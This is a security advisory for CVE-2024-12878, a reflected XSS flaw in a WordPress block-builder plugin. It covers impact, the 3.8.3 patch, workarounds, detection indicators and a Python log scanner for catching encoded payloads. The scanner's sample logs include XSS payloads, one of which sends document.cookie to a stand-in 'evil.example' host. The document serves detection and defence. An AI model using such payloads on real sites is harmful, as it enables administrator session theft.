CVE-2024-12878
📋 TL;DR
The Custom Block Builder WordPress plugin fails to sanitize and escape a request parameter before reflecting it into a page, so an attacker can craft a URL that executes attacker-controlled JavaScript in the browser of any administrator or other high-privilege user who opens it. Sites running an affected plugin version (below 3.8.3) are exposed; because the script runs with the victim's authenticated WordPress session, administrative accounts can be compromised.
💻 Affected Systems
- WordPress Custom Block Builder plugin
📦 What is this software?
Lazy Blocks by Thedevoice
⚠️ Risk & Real-World Impact
Worst Case
Administrator account takeover leading to full site compromise, data theft, malware injection, or complete system control.
Likely Case
Session hijacking of admin accounts, privilege escalation, or defacement of the WordPress site.
If Mitigated
Limited: with admin access restricted to trusted IP ranges, a Content Security Policy that forbids inline script, and administrators trained not to open unsolicited links to the site's admin area, a lure either cannot reach the vulnerable page or cannot execute its payload.
🎯 Exploit Status
This is a reflected XSS: the attacker needs no account on the target site, but must get a logged-in administrator (or other high-privilege user) to open a crafted URL, for example through a phishing email or a link planted on a page the admin visits. Once clicked, the payload runs in the victim's browser with their authenticated WordPress session, so no further authentication bypass is needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.8.3
Vendor Advisory: https://wpscan.com/vulnerability/827444d1-87cb-4057-827a-d802eac82cf8/
Restart Required: No
Instructions:
1. Log into the WordPress admin panel.
2. Navigate to Plugins > Installed Plugins.
3. Find the Custom Block Builder plugin.
4. Click 'Update Now' if an update is available.
5. Alternatively, download version 3.8.3 or later from the WordPress plugin repository and update manually.
🔧 Temporary Workarounds
Disable vulnerable plugin
Temporarily deactivate the Custom Block Builder plugin until it can be updated. Confirm the slug first with wp plugin list, since the directory name of an installed plugin can differ from its display name:
wp plugin deactivate custom-block-builder
Implement WAF rules
Add web application firewall rules that block XSS payloads (script tags, javascript: URIs, event-handler attributes) in the query string of requests to the plugin's admin pages. Match on the URL-decoded request, since percent-encoded and double-encoded payloads slip past a rule that only inspects the raw string, and treat this as a stopgap: blocklist-style rules are routinely bypassed.
🧯 If You Can't Patch
- Restrict access to /wp-admin and wp-login.php to trusted networks with IP allowlisting, so a lured browser outside those networks never reaches the vulnerable page
- Send a Content Security Policy header whose script-src does not include 'unsafe-inline'; this blocks the injected inline script even when it is reflected. The WordPress admin depends on inline scripts, so this needs nonces or hashes and careful testing before enforcement (start in report-only mode)
🔍 How to Verify
Check if Vulnerable:
Check plugin version in WordPress admin under Plugins > Installed Plugins. If version is below 3.8.3, system is vulnerable.
Check Version:
wp plugin get custom-block-builder --field=version
Verify Fix Applied:
Confirm plugin version is 3.8.3 or higher in WordPress admin panel.
📡 Detection & Monitoring
Log Indicators:
- Requests to wp-admin pages whose query string or POST body contains script tags, javascript: URIs or event-handler attributes, in raw or percent-encoded form
- Privileged actions (new administrator created, plugin or theme files edited, password or email changed) performed from an IP or user agent that differs from the admin's usual one shortly after such a request
Network Indicators:
- Inbound HTTP requests carrying script payloads in query parameters, often with a Referer from webmail or an unrelated third-party site (the lure)
- Outbound connections from the WordPress server to unfamiliar domains, a sign of malware installed with a hijacked admin session; on the admin's workstation, browser requests to unfamiliar hosts immediately after an admin page load (cookie or nonce exfiltration)
SIEM Query:
source="wordpress.log" AND ("<script" OR "javascript:" OR "onload=" OR "onerror=" OR "%3Cscript" OR "%3cscript" OR "javascript%3A" OR "onerror%3D")
This matches only literal and single-percent-encoded forms; double-encoded or HTML-entity-encoded payloads are missed, so decode the request URI field at ingest time where the SIEM supports it, and scope the search to wp-admin paths to cut noise from legitimate post content that contains markup.
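A small log scan that applies the indicators above to access-log lines, as an added example that is not part of this advisory or the plugin's code: it URL-decodes the request target and Referer (repeatedly, since attackers double-encode) before matching, which the raw substring SIEM query does not do. The log lines, the /wp-admin/admin.php?page=example-plugin-page path, the tab and redirect parameter names and the evil.example host are all constructed placeholders, not the real vulnerable endpoint or a known attacker domain.

```python
"""Scan access-log lines for reflected-XSS indicators.

Added example, not code from the advisory or the plugin. Parses
Apache/nginx "combined" log lines, URL-decodes the request target and
Referer, and applies indicator patterns to the decoded text. The sample
log lines, the admin page path and the parameter names are constructed
placeholders, not the real vulnerable endpoint.
"""
import re
from urllib.parse import unquote_plus

# combined format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The page's SIEM indicators plus the tag and handler variants that carry the same payload.
# Event handlers are an explicit list rather than on\w+= so that option=, once= etc. are not flagged.
# Patterns are applied to lowercased text, so no re.I is needed.
XSS_INDICATORS = {
    "script_tag": re.compile(r"<\s*script\b"),
    "javascript_uri": re.compile(r"javascript\s*:"),
    "event_handler": re.compile(
        r"\bon(error|load|click|mouseover|focus|toggle|pointer\w+|animation\w+)\s*="
    ),
    "svg_img_tag": re.compile(r"<\s*(svg|img|iframe)\b"),
}


def parse_combined(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def normalize(value, rounds=3):
    """URL-decode up to `rounds` times (stops early once stable) and lowercase."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value.lower()


def find_indicators(text):
    """Names of the indicator patterns that match the decoded text, in fixed order."""
    norm = normalize(text)
    return [name for name, rx in XSS_INDICATORS.items() if rx.search(norm)]


def naive_match(line):
    """The SIEM query as originally written: raw substring match, no decoding."""
    return any(tok in line for tok in ("<script", "javascript:", "onload=", "onerror="))


def scan_log(lines):
    """Return one finding per line whose request target or Referer carries a payload."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if not rec:
            continue
        # The lure leaves the payload in the query string; if the admin then navigates
        # on from the poisoned page, it also shows up as the Referer of the next hit.
        found = find_indicators(rec["target"]) or find_indicators(rec["referer"])
        if found:
            hits.append({"ip": rec["ip"], "target": rec["target"],
                         "status": rec["status"], "indicators": found})
    return hits


# Constructed sample lines (not real traffic). Paths and parameter names are placeholders.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2025:10:00:01 +0000] "GET /wp-admin/admin.php?page=example-plugin-page HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2025:10:00:05 +0000] "GET /wp-admin/admin.php?page=example-plugin-page&tab=<script>alert(1)</script> HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2025:10:00:09 +0000] "GET /wp-admin/admin.php?page=example-plugin-page&tab=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27//evil.example/%27%2Bdocument.cookie)%3E HTTP/1.1" 200 5120 "https://mail.example/" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Jan/2025:10:00:12 +0000] "GET /wp-admin/admin.php?page=example-plugin-page&redirect=%256A%2561vascript%253Aalert(1) HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["indicators"], hit["target"])
    print("raw substring query would flag:", [naive_match(l) for l in SAMPLE_LOG])
```

Of the three malicious sample lines, the raw substring query catches only the first; the percent-encoded image tag and the double-encoded javascript: URI are found only after decoding. The event-handler pattern is deliberately an explicit list, trading recall for fewer false positives on ordinary parameter names.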